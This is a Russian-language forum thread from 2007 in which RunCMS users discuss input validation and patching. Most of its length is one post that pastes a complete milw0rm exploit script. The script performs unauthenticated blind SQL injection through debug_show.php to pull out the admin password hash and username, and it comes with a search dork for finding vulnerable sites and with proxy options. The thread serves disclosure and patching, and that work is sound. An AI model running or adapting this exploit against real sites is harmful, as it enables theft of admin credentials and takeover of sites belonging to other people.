Сайт сообщества | Клуб пользователей | О проекте

Имя
Пароль
ПравилаРегистрацияСправка
Сообщения за деньПоиск

Вернуться   Клуб пользователей портальной системы RUNCMS > Портал > Безопасность

Ответ
 
Опции темы Опции просмотра
Michael-XIII вне форума Michael-XIII
Стар я для всего этого

Аватар для Michael-XIII

| Цитировать Старый #11 05-14-2007, 11:46

>наиболее используемые переменные.
Каким искуственным интеллекстом предполагается их определять?

> $_REQUEST
Именно это и происходит в репозитории постепенно, однако это не отменяет неоходимости приводить числа к числовым значениям,

а вот это уже целиком на совести разработчиков модулей, коих иногда днем с огнем не найдешь :-)


"А почему в RunCMS глючит ... ?"
"Глупые винят других. Умные – себя. А мудрые идут вперед". (С)
Посетить домашнюю страницу Michael-XIII
  Сообщения: 1,313 c 18.07.2005 | Репутация: 93
HDMan вне форума HDMan
Зам старшего участника


| Цитировать Старый #12 05-14-2007, 13:09

может я не совсем правильно выразился.
щас постораюсь объяснить свои размышления
1 - основное количество модулей пишутся примерно по одному шаблону или переделываются из других модулей (соответственно и баги одни и те же).
2 - обычно программисты называя переменные используют опорную информацию (например в базе есть поле id и переменную называют $id)
3- в модулях часто используются $HTTP_POST_VARS, $HTTP_GET_VARS, $_GET, $_POST - как правило проверяется только одна из этих переменных, значит при передаче переменной другим способом можно нередать информацию которая не будет проверена скриптом.
устранить 3-ю причину можно заменой всех
$HTTP_POST_VARS
$HTTP_GET_VARS
$_GET
$_POST
на $_REQUEST
(просто взять и заменить во всех файлах все выше указанные глобальные переменные на $_REQUEST, таким образом мы избавимся сразу от части проблем)
для устранения дыр когда программист "забывает" обнулить используемую переменную или принить её в скрипт напрямую а не через глобальные переменные (которые он проверит на тип)
тоесть первичное обращение к переменной происходит не по $_REQUEST['имя_переменной'], а по $имя_переменной мы можем избавится обнулив все "стандартные" имена переменных в начале скриптов.
например: вставить в common.php следующий код
Код:
$id=0;
$lid=0;
$cid=0;
$uid=0;
$name="";
$uname="";
$idname="";
$uname="";
$text="";
...
но думаю что это скажится на производительности
Мне второй способ и самому не очень нравиться, но он может закрыть дыру указанную выше, (покрайней мере нельзя будет использовать "стандартные" переменные без их вызова через глобальные переменные.)



Посетить домашнюю страницу HDMan
  Сообщения: 341 c 06.11.2005 | Репутация: 75
Michael-XIII вне форума Michael-XIII
Стар я для всего этого

Аватар для Michael-XIII

| Цитировать Старый #13 05-14-2007, 13:18

Я понял вас - а теперь представьте, что я выкачу версию RunCMS в которой обнуляются все основные переменные как вы сказали - значете, что начнется?

50% модулей (а то и больше) РАБОТАТЬ НЕ БУДЕТ без переделки, и во всем этом обвинят разработчиков RunCMS.

Большинство вебмастеров, не могут в тексте найти echo $переменная, что уж говорить про какие-то осмысленные правки. - посмотрите на вопросы на форумах


"А почему в RunCMS глючит ... ?"
"Глупые винят других. Умные – себя. А мудрые идут вперед". (С)
Посетить домашнюю страницу Michael-XIII
  Сообщения: 1,313 c 18.07.2005 | Репутация: 93
Shurik2k5 вне форума Shurik2k5
Проживающий

Аватар для Shurik2k5

| Цитировать Старый #14 05-14-2007, 15:34

HDMan разработчики, как сказал Michael-XIII, переписывают потихоньку на $_REQUEST, но делать 3 вариант, ИМХО, неправильно.
В стандартных модулях со временем все исправим, а вот о сторонних пусть думаю разработчики, либо те, кто все это дело использует на свой срах и риск, но в грамотно написанном модуле все должно проверяться и приводится.


Форум RunLiveCMS
Багтрекер RunLiveCMS
Энциклопедия RunLiveCMS
Посетить домашнюю страницу Shurik2k5
  Сообщения: 513 c 12.06.2006 | Репутация: 80
Michael-XIII вне форума Michael-XIII
Стар я для всего этого

Аватар для Michael-XIII

| Цитировать Старый #15 05-14-2007, 15:39

>использует на свой срах и риск

Именно что на первое слово :-)


"А почему в RunCMS глючит ... ?"
"Глупые винят других. Умные – себя. А мудрые идут вперед". (С)
Посетить домашнюю страницу Michael-XIII
  Сообщения: 1,313 c 18.07.2005 | Репутация: 93
Acidrayne вне форума Acidrayne
Участник

Аватар для Acidrayne

| Цитировать Старый #16 05-14-2007, 23:12

Скажите я вот сейчас всерьез занялся безопасностью, ктото постоянно пытается хакнуть меня! И както рыская в инете нашел вот такую фигню:
PHP код:
<?php
print_r
('
--------------------------------------------------------------------------
RunCms <= 1.5.2 /class/debug/debug_show.php sql injection / credentials
disclosure exploit
by rgod
mail: retrog at alice dot it
site: http://retrogod.altervista.org

dork: "Runcms Copyright" "2002 - 2007" +"page created"
---------------------------------------------------------------------------
'
);

/*
software site: http://www.runcms.org/modules/news/

vulnerable code in /class/debug/debug_show.php:
<?php
...

include_once("../../mainfile.php");
include_once("../../header.php");

switch($_POST['debug_show']) {
  case "show_files":
    show_files($_POST['loaded_files']);
    break;

  case "show_queries":
    show_queries($_POST['executed_queries'], $_POST['sorted']);
    break;
}

include_once("../../footer.php");
?>

no authentication is performed to run show_files() and show_queries()
functions, look at this now in /class/debug/debug.php:

...
function show_queries($executed_queries, $sorted=0)
{
   global $db;

   $executed_queries = unserialize(urldecode($executed_queries));

   if ($sorted == 1)
   {
      sort($executed_queries);
      $is_sorted = _DBG_SORTEDR;
   }
   else
   {
      array_reverse($executed_queries);
      $is_sorted = _DBG_NSORTEDR;
   }

   OpenTable();

   $fulldebug = "
    <h4>($is_sorted) "._DBG_QEXECED.": ".count($executed_queries)."</h4>
    <table width='100%' cellpadding='3' cellspacing='1'>";

   $size = count($executed_queries);

   for ($i=0; $i<$size; $i++)
   {
      $stime = get_micro_time();

      $query      = $db->query("EXPLAIN ".$executed_queries[$i]."");
      $querytime  = (get_micro_time() - $stime);
      $totaltime += $querytime;

      $fulldebug .= "<tr>
<td nowrap='nowrap' class='bg2'><b>"._DBG_QUERY.": ".($i+1)."</b></td>
<td colspan='7' class='bg3'>$executed_queries[$i]</td>
</tr><tr>
<td nowrap='nowrap' class='bg2'><b>"._DBG_TIME.":</b></td>
<td colspan='7' class='bg3'>".round($querytime, 4)." "._DBG_SECONDS."</td>
</tr><tr>
<td nowrap='nowrap' class='bg2'><b>"._DBG_TABLE.":</b></td>
<td nowrap='nowrap' class='bg2'><b>"._DBG_TYPE.":</b></td>
<td nowrap='nowrap' class='bg2'><b>"._DBG_POSSKEYS.":</b></td>
<td nowrap='nowrap' class='bg2'><b>"._DBG_KEY.":</b></td>
<td nowrap='nowrap' class='bg2'><b>"._DBG_KEYLEN.":</b></td>
                        <td nowrap='nowrap' class='bg2'><b>ref:</b></td>
<td nowrap='nowrap' class='bg2'><b>"._DBG_ROWS.":</b></td>
<td nowrap='nowrap' class='bg2'><b>"._DBG_EXTRA.":</b></td>
                        </tr>";

      while ($result = $db->fetch_array($query))
      {
         $fulldebug .= " <tr>
<td class='bg3' nowrap='nowrap' {$result['table']}&nbsp;</td>
<td class='bg3' nowrap='nowrap' {$result['type']}&nbsp;</td>
<td class='bg3'>{$result['possible_keys']}&nbsp;</td>
<td class='bg3' nowrap='nowrap' {$result['key']}&nbsp;</td>
<td class='bg3' nowrap='nowrap' {$result['key_len']}&nbsp;</td>
                        <td class='bg3' nowrap='nowrap' {$result['ref']}&nbsp;</td>
<td class='bg3' nowrap='nowrap' {$result['rows']}&nbsp;</td>
<td class='bg3'>{$result['Extra']}&nbsp;</td>
                        </tr>";
      }
      $fulldebug .= "<tr>
<td colspan='8' class='bg1'>"._DBG_CUMULATED.":".round($totaltime, 4)." "._DBG_SECONDS."<hr noshade></td>
</tr>";
   }

   $fulldebug .= "</table>";

   echo $fulldebug;
   CloseTable();
}
...

we have a nice kind of sql injection here!

also show_files function can be used to check the existence of certain files
and retrieve the filesize or if it has been modified and so on...


*/

if ($argc<3) {
    
print_r('
---------------------------------------------------------------------------
Usage: php '
.$argv[0].' host path OPTIONS
host:      target server (ip/hostname)
path:      path to runcms

Options:
 -p[port]:    specify a port other than 80
 -P[ip:port]:    ""   a proxy
 -T[prefix]      ""   a table prefix (default: runcms)
Example:
php '
.$argv[0].' localhost /runcms/ ls -la -P1.1.1.1:80
php '
.$argv[0].' localhost /runcms/ ls -la -p81
---------------------------------------------------------------------------
'
);
    die;
}

error_reporting(7);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function 
quick_dump($string)
{
  
$result='';$exa='';$cont=0;
  for (
$i=0$i<=strlen($string)-1$i++)
  {
   if ((
ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {
$result.="  .";}
   else
   {
$result.="  ".$string[$i];}
   if (
strlen(dechex(ord($string[$i])))==2)
   {
$exa.=" ".dechex(ord($string[$i]));}
   else
   {
$exa.=" 0".dechex(ord($string[$i]));}
   
$cont++;if ($cont==15) {$cont=0$result.="\r\n"$exa.="\r\n";}
  }
 return 
$exa."\r\n".$result;
}
$proxy_regex '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function 
send($packet)
{
  global 
$proxy$host$port$html$proxy_regex;
  if (
$proxy=='') {
    
$ock=fsockopen(gethostbyname($host),$port);
    if (!
$ock) {
      echo 
'No response from '.$host.':'.$port; die;
    }
  }
  else {
$c preg_match($proxy_regex,$proxy);
    if (!
$c) {
      echo 
'Not a valid proxy...';die;
    }
    
$parts=explode(':',$proxy);
    
$parts[1]=(int)$parts[1];
    echo 
"Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    
$ock=fsockopen($parts[0],$parts[1]);
    if (!
$ock) {
      echo 
'No response from proxy...';die;
}
  }
  
fputs($ock,$packet);
  if (
$proxy=='') {
    
$html='';
    while (!
feof($ock)) {
      
$html.=fgets($ock);
    }
  }
  else {
    
$html='';
    while ((!
feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      
$html.=fread($ock,1);
    }
  }
  
fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
$prefix="runcms";

for (
$i=3$i<$argc$i++){
$temp=$argv[$i][0].$argv[$i][1];
if (
$temp=="-p")
{
  
$port=(int)str_replace("-p","",$argv[$i]);
}
if (
$temp=="-P")
{
  
$proxy=str_replace("-P","",$argv[$i]);
}
if (
$temp=="-T")
{
  
$prefix=str_replace("-T","",$argv[$i]);
}
}
if ((
$path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if (
$proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));
echo "md5 hash -> ";
$j=1;$password="";
while (!
strstr($password,chr(0))){
    for (
$i=0$i<=255$i++){
        if (
in_array($i,$md5s)){
            
$executed_queries=array();
            
//original query: EXPLAIN ...
            
$executed_queries[0]="SELECT null FROM ".$prefix."_users WHERE 1=(IF((ASCII(SUBSTRING(pass,".$j.",1))=".$i."),1,999999)) AND rank=7 LIMIT 1";
            
$sql=urlencode(serialize($executed_queries));
            
$sql=str_replace("%22","%2522",$sql);//you know, urldecode()...
            
$data ="debug_show=show_queries";
            
$data.="&executed_queries=".$sql;
            
$data.="&sorted=1";
            
$packet ="POST ".$p."class/debug/debug_show.php HTTP/1.0\r\n";
            
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
            
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
            
$packet.="Host: ".$host."\r\n";
            
$packet.="Content-Length: ".strlen($data)."\r\n";
            
$packet.="Pragma: no-cache\r\n";
            
$packet.="Connection: Close\r\n\r\n";
            
$packet.=$data;
            
send($packet);
            if (
eregi("_users&nbsp;</td>",$html)){$password.=chr($i);echo chr($i); sleep(1); break;}
        }
        if (
$i==255) {die("Exploit failed...");}
  }
  
$j++;
}
echo 
"\n";

echo 
"admin username -> ";
$j=1;$admin_user="";
while (!
strstr($admin_user,chr(0))){
    for (
$i=0$i<=255$i++){
        
$executed_queries=array();
        
$executed_queries[0]="SELECT null FROM ".$prefix."_users WHERE 1=(IF((ASCII(SUBSTRING(uname,".$j.",1))=".$i."),1,999999)) AND rank=7 LIMIT 1";
        
$sql=urlencode(serialize($executed_queries));
        
$sql=str_replace("%22","%2522",$sql);
        
$data ="debug_show=show_queries";
        
$data.="&executed_queries=".$sql;
        
$data.="&sorted=1";
        
$packet ="POST ".$p."class/debug/debug_show.php HTTP/1.0\r\n";
        
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
        
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
        
$packet.="Host: ".$host."\r\n";
        
$packet.="Content-Length: ".strlen($data)."\r\n";
        
$packet.="Pragma: no-cache\r\n";
        
$packet.="Connection: Close\r\n\r\n";
        
$packet.=$data;
        
send($packet);
        if (
eregi("_users&nbsp;</td>",$html)){$admin_user.=chr($i);echo chr($i); sleep(1); break;}
    }
    if (
$i==255) {die("Exploit failed...");}
    
$j++;
}
?>

# milw0rm.com [2007-05-04]
вот по этому адресу: _http://milw0rm.com/exploits/3850 Я сильно в этом не разбераюсь, может комуто и поможет закрыть еще одну дыру, если она конечно не закрыта уже !

  Сообщения: 137 c 26.11.2006 | Репутация: 2
Gloooom вне форума Gloooom
Участник


| Цитировать Старый #18 05-15-2007, 12:16

Сорри что не в тему, но может кто нибудь переделает этот баг фикс на 1.4, а то сказано что дыра может быть и в более ранних версиях.
Я понимаю, что этого делать никто не должен, но может всё таки найдётся такой?

  Сообщения: 203 c 26.02.2006 | Репутация: 8
Michael-XIII вне форума Michael-XIII
Стар я для всего этого

Аватар для Michael-XIII

| Цитировать Старый #19 05-15-2007, 12:19

фикс работает на версиях до 1.2 включительно (на 1.2 ставил лично).
Могут быть пропущены пара языковых констант, но это некритично

Читайте первоисточник http://runcms.org/modules/news/


"А почему в RunCMS глючит ... ?"
"Глупые винят других. Умные – себя. А мудрые идут вперед". (С)
Посетить домашнюю страницу Michael-XIII
  Сообщения: 1,313 c 18.07.2005 | Репутация: 93
Gloooom вне форума Gloooom
Участник


| Цитировать Старый #20 05-15-2007, 13:39

Цитата:
Сообщение от Michael-XIII Посмотреть сообщение
фикс работает на версиях до 1.2 включительно (на 1.2 ставил лично).
Могут быть пропущены пара языковых констант, но это некритично
Читайте первоисточник http://runcms.org/modules/news/
Ага, спасибо большое, действительно пашет. Да, одна константа была упущена, во всяком случае у меня: _DBG_CACHED.

  Сообщения: 203 c 26.02.2006 | Репутация: 8
Ответ

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход


Рейтинг@Mail.ru Хостинг провайдер Majordomo. Powered by: vBulletin Version 3.0
Copyright ©2000-2018, Jelsoft Enterprises Ltd.
Все разделы прочитаны - Руководство форума - Архив - Вверх
Rambler's Top100
Output: 130.53 Kb. compressed to 123.34 Kb. by saving 7.19 Kb. (5.50%)
Page generated in 0.23738 seconds with 10 queries